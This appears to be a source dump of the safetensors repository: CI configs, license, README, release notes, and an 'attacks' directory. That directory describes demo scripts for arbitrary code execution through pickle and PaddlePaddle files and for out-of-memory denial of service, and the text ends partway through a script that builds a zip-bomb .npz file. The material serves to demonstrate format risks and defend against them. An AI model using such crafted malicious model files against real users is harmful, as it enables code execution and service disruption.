--output-path lcov.info 58 | 59 | # - name: Upload to codecov.io 60 | # if: matrix.os == 'ubuntu-latest' 61 | # uses: codecov/codecov-action@v3 62 | # with: 63 | # token: ${{ secrets.CODECOV_TOKEN }} # not required for public repos 64 | # working-directory: ./safetensors 65 | # fail_ci_if_error: true 66 | -------------------------------------------------------------------------------- /.github/workflows/stale.yml: -------------------------------------------------------------------------------- 1 | name: 'Close stale issues and PRs' 2 | on: 3 | schedule: 4 | - cron: '30 1 * * *' 5 | 6 | jobs: 7 | stale: 8 | runs-on: ubuntu-latest 9 | steps: 10 | - uses: actions/stale@v8 11 | with: 12 | stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.' 13 | days-before-stale: 30 14 | days-before-close: 5 15 | -------------------------------------------------------------------------------- /.github/workflows/trufflehog.yml: -------------------------------------------------------------------------------- 1 | on: 2 | push: 3 | 4 | name: Secret Leaks 5 | 6 | jobs: 7 | trufflehog: 8 | runs-on: ubuntu-latest 9 | steps: 10 | - name: Checkout code 11 | uses: actions/checkout@v4 12 | with: 13 | fetch-depth: 0 14 | - name: Secret Scanning 15 | uses: trufflesecurity/trufflehog@main 16 | -------------------------------------------------------------------------------- /.github/workflows/upload_pr_documentation.yml: -------------------------------------------------------------------------------- 1 | name: Upload PR Documentation 2 | 3 | on: 4 | workflow_run: 5 | workflows: ["Build PR Documentation"] 6 | types: 7 | - completed 8 | 9 | jobs: 10 | build: 11 | uses: huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml@main 12 | with: 13 | package_name: safetensors 14 | secrets: 15 | hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }} 16 | comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }} -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | safetensors/target 2 | safetensors/**/Cargo.lock 3 | bindings/python/Cargo.lock 4 | *.bin 5 | *.h5 6 | *.msgpack 7 | *.pt 8 | *.pdparams 9 | *.safetensors 10 | *.npz 11 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/Narsil/pre-commit-rust 3 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c 4 | hooks: 5 | - id: fmt 6 | name: "Rust (fmt)" 7 | args: ["--manifest-path", "safetensors/Cargo.toml", "--"] 8 | - id: clippy 9 | name: "Rust (clippy)" 10 | args: 11 | [ 12 | "--manifest-path", 13 | "safetensors/Cargo.toml", 14 | "--all-targets", 15 | "--", 16 | "-Dwarnings", 17 | ] 18 | - repo: https://github.com/Narsil/pre-commit-rust 19 | rev: 0c016cee78144d06d906fccc7715d607a946ca5c 20 | hooks: 21 | - id: fmt 22 | name: "Python (fmt)" 23 | args: ["--manifest-path", "bindings/python/Cargo.toml", "--"] 24 | - id: clippy 25 | name: "Python (clippy)" 26 | args: 27 | [ 28 | "--manifest-path", 29 | "bindings/python/Cargo.toml", 30 | "--all-targets", 31 | "--", 32 | "-Dwarnings", 33 | ] 34 | - repo: https://github.com/psf/black 35 | rev: 22.3.0 36 | hooks: 37 | - id: black 38 | name: "Python (black)" 39 | args: ["--line-length", "119", "--target-version", "py35"] 40 | types: ["python"] 41 | - repo: https://github.com/pycqa/flake8 42 | rev: 3.8.3 43 | hooks: 44 | - id: flake8 45 | args: ["--config", "bindings/python/setup.cfg"] 46 | - repo: https://github.com/pre-commit/mirrors-isort 47 | rev: v5.7.0 # Use the revision sha / tag you want to point at 48 | hooks: 49 | - id: isort 50 | -------------------------------------------------------------------------------- /Dockerfile.s390x.test: -------------------------------------------------------------------------------- 1 | FROM s390x/python 2 | RUN wget https://repo.anaconda.com/miniconda/Miniconda3-py311_23.5.2-0-Linux-s390x.sh \ 3 | && bash Miniconda3-py311_23.5.2-0-Linux-s390x.sh -b \ 4 | && rm -f Miniconda3-py311_23.5.2-0-Linux-s390x.sh 5 | RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | bash -s -- -y 6 | RUN /root/miniconda3/bin/conda install pytorch cpuonly -c pytorch -y 7 | WORKDIR /safetensors/ 8 | RUN /root/miniconda3/bin/pip install -U pip pytest 9 | # RUN /root/miniconda3/bin/pip install -U huggingface_hub 10 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors")' 11 | COPY . . 12 | SHELL ["/bin/bash", "-c"] 13 | WORKDIR /safetensors/bindings/python/ 14 | RUN source /root/.cargo/env && /root/miniconda3/bin/pip install -e . 15 | RUN /root/miniconda3/bin/pytest -sv tests/test_pt_* tests/test_simple.py 16 | # RUN /root/miniconda3/bin/python -c 'from huggingface_hub import hf_hub_download; filename = hf_hub_download("roberta-base", "model.safetensors"); from safetensors.torch import load_file; weights = load_file(filename); assert weights["roberta.embeddings.position_embeddings.weight"][0][0].abs().item() > 1e-10' 17 | ENTRYPOINT /bin/bash 18 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | doc: 2 | cd safetensors && cargo readme > README.md && cargo readme > ../README.md && cd .. 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 | 4 | 5 | Hugging Face Safetensors Library 6 | 7 |
8 |
9 |

10 | 11 | Python 12 | [![Pypi](https://img.shields.io/pypi/v/safetensors.svg)](https://pypi.org/pypi/safetensors/) 13 | [![Documentation](https://img.shields.io/website/http/huggingface.co/docs/safetensors/index.svg?label=docs)](https://huggingface.co/docs/safetensors/index) 14 | [![Codecov](https://codecov.io/github/huggingface/safetensors/coverage.svg?branch=main)](https://codecov.io/gh/huggingface/safetensors) 15 | [![Downloads](https://static.pepy.tech/badge/safetensors/month)](https://pepy.tech/project/safetensors) 16 | 17 | Rust 18 | [![Crates.io](https://img.shields.io/crates/v/safetensors.svg)](https://crates.io/crates/safetensors) 19 | [![Documentation](https://docs.rs/safetensors/badge.svg)](https://docs.rs/safetensors/) 20 | [![Codecov](https://codecov.io/github/huggingface/safetensors/coverage.svg?branch=main)](https://codecov.io/gh/huggingface/safetensors) 21 | [![Dependency status](https://deps.rs/repo/github/huggingface/safetensors/status.svg?path=safetensors)](https://deps.rs/repo/github/huggingface/safetensors?path=safetensors) 22 | 23 | # safetensors 24 | 25 | ## Safetensors 26 | 27 | This repository implements a new simple format for storing tensors 28 | safely (as opposed to pickle) and that is still fast (zero-copy). 29 | 30 | ### Installation 31 | #### Pip 32 | 33 | You can install safetensors via the pip manager: 34 | 35 | ```bash 36 | pip install safetensors 37 | ``` 38 | 39 | #### From source 40 | 41 | For the sources, you need Rust 42 | 43 | ```bash 44 | # Install Rust 45 | curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh 46 | # Make sure it's up to date and using stable channel 47 | rustup update 48 | git clone https://github.com/huggingface/safetensors 49 | cd safetensors/bindings/python 50 | pip install setuptools_rust 51 | pip install -e . 52 | ``` 53 | 54 | ### Getting started 55 | 56 | ```python 57 | import torch 58 | from safetensors import safe_open 59 | from safetensors.torch import save_file 60 | 61 | tensors = { 62 | "weight1": torch.zeros((1024, 1024)), 63 | "weight2": torch.zeros((1024, 1024)) 64 | } 65 | save_file(tensors, "model.safetensors") 66 | 67 | tensors = {} 68 | with safe_open("model.safetensors", framework="pt", device="cpu") as f: 69 | for key in f.keys(): 70 | tensors[key] = f.get_tensor(key) 71 | ``` 72 | 73 | [Python documentation](https://huggingface.co/docs/safetensors/index) 74 | 75 | 76 | ### Format 77 | 78 | - 8 bytes: `N`, an unsigned little-endian 64-bit integer, containing the size of the header 79 | - N bytes: a JSON UTF-8 string representing the header. 80 | - The header data MUST begin with a `{` character (0x7B). 81 | - The header data MAY be trailing padded with whitespace (0x20). 82 | - The header is a dict like `{"TENSOR_NAME": {"dtype": "F16", "shape": [1, 16, 256], "data_offsets": [BEGIN, END]}, "NEXT_TENSOR_NAME": {...}, ...}`, 83 | - `data_offsets` point to the tensor data relative to the beginning of the byte buffer (i.e. not an absolute position in the file), 84 | with `BEGIN` as the starting offset and `END` as the one-past offset (so total tensor byte size = `END - BEGIN`). 85 | - A special key `__metadata__` is allowed to contain free form string-to-string map. Arbitrary JSON is not allowed, all values must be strings. 86 | - Rest of the file: byte-buffer. 87 | 88 | Notes: 89 | - Duplicate keys are disallowed. Not all parsers may respect this. 90 | - In general the subset of JSON is implicitly decided by `serde_json` for 91 | this library. Anything obscure might be modified at a later time, that odd ways 92 | to represent integer, newlines and escapes in utf-8 strings. This would only 93 | be done for safety concerns 94 | - Tensor values are not checked against, in particular NaN and +/-Inf could 95 | be in the file 96 | - Empty tensors (tensors with 1 dimension being 0) are allowed. 97 | They are not storing any data in the databuffer, yet retaining size in the header. 98 | They don't really bring a lot of values but are accepted since they are valid tensors 99 | from traditional tensor libraries perspective (torch, tensorflow, numpy, ..). 100 | - 0-rank Tensors (tensors with shape `[]`) are allowed, they are merely a scalar. 101 | - The byte buffer needs to be entirely indexed, and cannot contain holes. This prevents 102 | the creation of polyglot files. 103 | - Endianness: Little-endian. 104 | moment. 105 | - Order: 'C' or row-major. 106 | 107 | 108 | ### Yet another format ? 109 | 110 | The main rationale for this crate is to remove the need to use 111 | `pickle` on `PyTorch` which is used by default. 112 | There are other formats out there used by machine learning and more general 113 | formats. 114 | 115 | 116 | Let's take a look at alternatives and why this format is deemed interesting. 117 | This is my very personal and probably biased view: 118 | 119 | | Format | Safe | Zero-copy | Lazy loading | No file size limit | Layout control | Flexibility | Bfloat16/Fp8 120 | | ----------------------- | --- | --- | --- | --- | --- | --- | --- | 121 | | pickle (PyTorch) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 | 122 | | H5 (Tensorflow) | 🗸 | ✗ | 🗸 | 🗸 | ~ | ~ | ✗ | 123 | | SavedModel (Tensorflow) | 🗸 | ✗ | ✗ | 🗸 | 🗸 | ✗ | 🗸 | 124 | | MsgPack (flax) | 🗸 | 🗸 | ✗ | 🗸 | ✗ | ✗ | 🗸 | 125 | | Protobuf (ONNX) | 🗸 | ✗ | ✗ | ✗ | ✗ | ✗ | 🗸 | 126 | | Cap'n'Proto | 🗸 | 🗸 | ~ | 🗸 | 🗸 | ~ | ✗ | 127 | | Arrow | ? | ? | ? | ? | ? | ? | ✗ | 128 | | Numpy (npy,npz) | 🗸 | ? | ? | ✗ | 🗸 | ✗ | ✗ | 129 | | pdparams (Paddle) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 | 130 | | SafeTensors | 🗸 | 🗸 | 🗸 | 🗸 | 🗸 | ✗ | 🗸 | 131 | 132 | - Safe: Can I use a file randomly downloaded and expect not to run arbitrary code ? 133 | - Zero-copy: Does reading the file require more memory than the original file ? 134 | - Lazy loading: Can I inspect the file without loading everything ? And loading only 135 | some tensors in it without scanning the whole file (distributed setting) ? 136 | - Layout control: Lazy loading, is not necessarily enough since if the information about tensors is spread out in your file, then even if the information is lazily accessible you might have to access most of your file to read the available tensors (incurring many DISK -> RAM copies). Controlling the layout to keep fast access to single tensors is important. 137 | - No file size limit: Is there a limit to the file size ? 138 | - Flexibility: Can I save custom code in the format and be able to use it later with zero extra code ? (~ means we can store more than pure tensors, but no custom code) 139 | - Bfloat16/Fp8: Does the format support native bfloat16/fp8 (meaning no weird workarounds are 140 | necessary)? This is becoming increasingly important in the ML world. 141 | 142 | 143 | ### Main oppositions 144 | 145 | - Pickle: Unsafe, runs arbitrary code 146 | - H5: Apparently now discouraged for TF/Keras. Seems like a great fit otherwise actually. Some classic use after free issues: . On a very different level than pickle security-wise. Also 210k lines of code vs ~400 lines for this lib currently. 147 | - SavedModel: Tensorflow specific (it contains TF graph information). 148 | - MsgPack: No layout control to enable lazy loading (important for loading specific parts in distributed setting) 149 | - Protobuf: Hard 2Go max file size limit 150 | - Cap'n'proto: Float16 support is not present [link](https://capnproto.org/language.html#built-in-types) so using a manual wrapper over a byte-buffer would be necessary. Layout control seems possible but not trivial as buffers have limitations [link](https://stackoverflow.com/questions/48458839/capnproto-maximum-filesize). 151 | - Numpy (npz): No `bfloat16` support. Vulnerable to zip bombs (DOS). Not zero-copy. 152 | - Arrow: No `bfloat16` support. 153 | 154 | ### Notes 155 | 156 | - Zero-copy: No format is really zero-copy in ML, it needs to go from disk to RAM/GPU RAM (that takes time). On CPU, if the file is already in cache, then it can 157 | truly be zero-copy, whereas on GPU there is not such disk cache, so a copy is always required 158 | but you can bypass allocating all the tensors on CPU at any given point. 159 | SafeTensors is not zero-copy for the header. The choice of JSON is pretty arbitrary, but since deserialization is <<< of the time required to load the actual tensor data and is readable I went that way, (also space is <<< to the tensor data). 160 | 161 | - Endianness: Little-endian. This can be modified later, but it feels really unnecessary at the 162 | moment. 163 | - Order: 'C' or row-major. This seems to have won. We can add that information later if needed. 164 | - Stride: No striding, all tensors need to be packed before being serialized. I have yet to see a case where it seems useful to have a strided tensor stored in serialized format. 165 | 166 | ### Benefits 167 | 168 | Since we can invent a new format we can propose additional benefits: 169 | 170 | - Prevent DOS attacks: We can craft the format in such a way that it's almost 171 | impossible to use malicious files to DOS attack a user. Currently, there's a limit 172 | on the size of the header of 100MB to prevent parsing extremely large JSON. 173 | Also when reading the file, there's a guarantee that addresses in the file 174 | do not overlap in any way, meaning when you're loading a file you should never 175 | exceed the size of the file in memory 176 | 177 | - Faster load: PyTorch seems to be the fastest file to load out in the major 178 | ML formats. However, it does seem to have an extra copy on CPU, which we 179 | can bypass in this lib by using `torch.UntypedStorage.from_file`. 180 | Currently, CPU loading times are extremely fast with this lib compared to pickle. 181 | GPU loading times are as fast or faster than PyTorch equivalent. 182 | Loading first on CPU with memmapping with torch, and then moving all tensors to GPU seems 183 | to be faster too somehow (similar behavior in torch pickle) 184 | 185 | - Lazy loading: in distributed (multi-node or multi-gpu) settings, it's nice to be able to 186 | load only part of the tensors on the various models. For 187 | [BLOOM](https://huggingface.co/bigscience/bloom) using this format enabled 188 | to load the model on 8 GPUs from 10mn with regular PyTorch weights down to 45s. 189 | This really speeds up feedbacks loops when developing on the model. For instance 190 | you don't have to have separate copies of the weights when changing the distribution 191 | strategy (for instance Pipeline Parallelism vs Tensor Parallelism). 192 | 193 | License: Apache-2.0 194 | -------------------------------------------------------------------------------- /RELEASE.md: -------------------------------------------------------------------------------- 1 | ## How to release 2 | 3 | # Before the release 4 | 5 | Simple checklist on how to make releases for `safetensors`. 6 | 7 | - Freeze `main` branch. 8 | - Run all tests (Check CI has properly run) 9 | - If any significant work, check benchmarks: 10 | - `cd safetensors && cargo bench` (needs to be run on latest release tag to measure difference if it's your first time) 11 | - Run all `transformers` tests. (`transformers` is a big user of `safetensors` we need 12 | to make sure we don't break it, testing is one way to make sure nothing unforeseen 13 | has been done.) 14 | - Run all fast tests at the VERY least (not just the tokenization tests). (`RUN_PIPELINE_TESTS=1 CUDA_VISIBLE_DEVICES=-1 pytest -sv tests/`) 15 | - When all *fast* tests work, then we can also (it's recommended) run the whole `transformers` 16 | test suite. 17 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16708). 18 | This will create new docker images ready to run the tests suites with `safetensors` from the main branch. 19 | - Wait for actions to finish 20 | - Rebase this [PR](https://github.com/huggingface/transformers/pull/16712) 21 | This will run the actual full test suite. 22 | - Check the results. 23 | - **If any breaking change has been done**, make sure the version can safely be increased for transformers users (`safetensors` version need to make sure users don't upgrade before `transformers` has). [link](https://github.com/huggingface/transformers/blob/main/setup.py#L154) 24 | For instance `safetensors>=0.10,<0.11` so we can safely upgrade to `0.11` without impacting 25 | current users 26 | - Then start a new PR containing all desired code changes from the following steps. 27 | - You will `Create release` after the code modifications are on `master`. 28 | 29 | # Rust 30 | 31 | - `safetensors` (rust, python & node) versions don't have to be in sync but it's 32 | very common to release for all versions at once for new features. 33 | - Edit `Cargo.toml` to reflect new version 34 | - Edit `CHANGELOG.md`: 35 | - Add relevant PRs that were added (python PRs do not belong for instance). 36 | - Add links at the end of the files. 37 | - Go to [Releases](https://github.com/huggingface/safetensors/releases) 38 | - Create new Release: 39 | - Mark it as pre-release 40 | - Use new version name with a new tag (create on publish) `vX.X.X`. 41 | - Copy paste the new part of the `CHANGELOG.md` 42 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading 43 | the new version on `crates.io`, there's no going back after this 44 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. 45 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. 46 | 47 | 48 | # Python 49 | 50 | - Edit `bindings/python/setup.py` to reflect new version. 51 | - Edit `bindings/python/py_src/safetensors/__init__.py` to reflect new version. 52 | - Edit `CHANGELOG.md`: 53 | - Add relevant PRs that were added (node PRs do not belong for instance). 54 | - Add links at the end of the files. 55 | - Go to [Releases](https://github.com/huggingface/safetensors/releases) 56 | - Create new Release: 57 | - Mark it as pre-release 58 | - Use new version name with a new tag (create on publish) `python-vX.X.X`. 59 | - Copy paste the new part of the `CHANGELOG.md` 60 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading 61 | the new version on `pypi`, there's no going back after this 62 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. 63 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. 64 | - This CI/CD has 3 distinct builds, `Pypi`(normal), `conda` and `extra`. `Extra` is REALLY slow (~4h), this is normal since it has to rebuild many things, but enables the wheel to be available for old Linuxes 65 | 66 | # Node 67 | 68 | - Edit `bindings/node/package.json` to reflect new version. 69 | - Edit `CHANGELOG.md`: 70 | - Add relevant PRs that were added (python PRs do not belong for instance). 71 | - Add links at the end of the files. 72 | - Go to [Releases](https://github.com/huggingface/safetensors/releases) 73 | - Create new Release: 74 | - Mark it as pre-release 75 | - Use new version name with a new tag (create on publish) `node-vX.X.X`. 76 | - Copy paste the new part of the `CHANGELOG.md` 77 | - ⚠️ Click on `Publish release`. This will start the whole process of building a uploading 78 | the new version on `npm`, there's no going back after this 79 | - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. 80 | - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. 81 | 82 | 83 | # Testing the CI/CD for release 84 | 85 | 86 | If you want to make modifications to the CI/CD of the release GH actions, you need 87 | to : 88 | - **Comment the part that uploads the artifacts** to `crates.io`, `PyPi` or `npm`. 89 | - Change the trigger mechanism so it can trigger every time you push to your branch. 90 | - Keep pushing your changes until the artifacts are properly created. 91 | -------------------------------------------------------------------------------- /attacks/README.md: -------------------------------------------------------------------------------- 1 | The purpose of this directory is to showcase various attacks (and creating your own). 2 | 3 | 4 | # Torch Arbitrary code execution 5 | 6 | Try it out. This will create a seemingly innocuous `torch_ace.pt` file. 7 | ``` 8 | python torch_ace_create.py 9 | python torch_ace_get_pwned.py 10 | ``` 11 | 12 | # PaddlePaddle Arbitrary code execution 13 | 14 | Try it out. This will create a seemingly innocuous `paddle_ace.pdparams` file. 15 | ``` 16 | python paddle_ace_create.py 17 | python paddle_ace_get_pwned.py 18 | ``` 19 | 20 | # Tensorflow (Keras) Arbitrary Code execution (does not affect `transformers`) 21 | 22 | Try it out. This will create a seemingly innocuous `tf_ace.h5` file. 23 | ``` 24 | python tf_dos_create.py 25 | python tf_dos_get_pwned.py 26 | ``` 27 | 28 | # Torch Denial of Service (OOM kills the running process) 29 | 30 | Try it out. This will create a seemingly innocuous `torch_dos.pt` file. 31 | ``` 32 | python torch_dos_create.py 33 | python torch_dos_get_pwned.py 34 | ``` 35 | 36 | # Numpy Denial of Service (OOM kills the running process) 37 | 38 | Try it out. This will create a seemingly innocuous `numpy_dos.npz` file. 39 | ``` 40 | python numpy_dos_create.py 41 | python numpy_dos_get_pwned.py 42 | ``` 43 | 44 | # Safetensors abuse attempts 45 | 46 | In order to try and check the limits, we also try to abuse the current format. 47 | Please send ideas! 48 | 49 | A few things can be abused: 50 | - Proposal 1: The initial 8 bytes, which could be too big with regards to the file. This crashes, and crashes early (Out of bounds) (Attempt #1). 51 | - Proposal 2: The initial header is JSON, an attacker could use a 4Go JSON file to delay the loads. Debattable how much of an attack this is, but at least 52 | it's impossible to "bomb" (like the DOS attacks above) where the files are vastly smaller than their expanded version (because of zip abuse). 53 | Various "protections" could be put in place, like a header proportion cap (header should always be <<< of the size of the file). (Attempt #2) 54 | - Proposal 3: The offsets could be negative, out of the file. This is all crashing by default. 55 | - Proposal 4: The offsets could overlap. ~~This is actually OK.~~ This is NOT ok. 56 | While testing Proposal 2, I realized that the tensors themselves where all allocated, and gave me an idea for a DOS exploit where you would have a relatively small 57 | file a few megs tops, but defining many tensors on the same overlapping part of the file, it was essentially a DOS attack. The mitigation is rather simple, we sanitize the fact 58 | that the offsets must be contiguous and non overlapping. 59 | - Proposal 5: The offsets could mismatch the declared shapes + dtype. This validated against. 60 | - Proposal 6: The file being mmaped could be modified while it's opened (attacker has access to your filesystem, seems like you're already pwned). 61 | - Proposal 7: serde JSON deserialization abuse (nothing so far: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=serde). It doesn't mean there isn't a flaw. Same goes for the actual rust compiled binary. 62 | 63 | ``` 64 | python safetensors_abuse_attempt_1.py 65 | python safetensors_abuse_attempt_2.py 66 | python safetensors_abuse_attempt_3.py 67 | ``` 68 | -------------------------------------------------------------------------------- /attacks/numpy_dos_create.py: -------------------------------------------------------------------------------- 1 | from zipfile import ZIP_DEFLATED, ZipFile 2 | 3 | FILESIZE = 40 * 1000 # 40 Go 4 | BUFFER = b"\0" * 1000 * 1000 # 1Mo 5 | 6 | outfilename = "numpy_dos.npz" 7 | with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip: 8 | 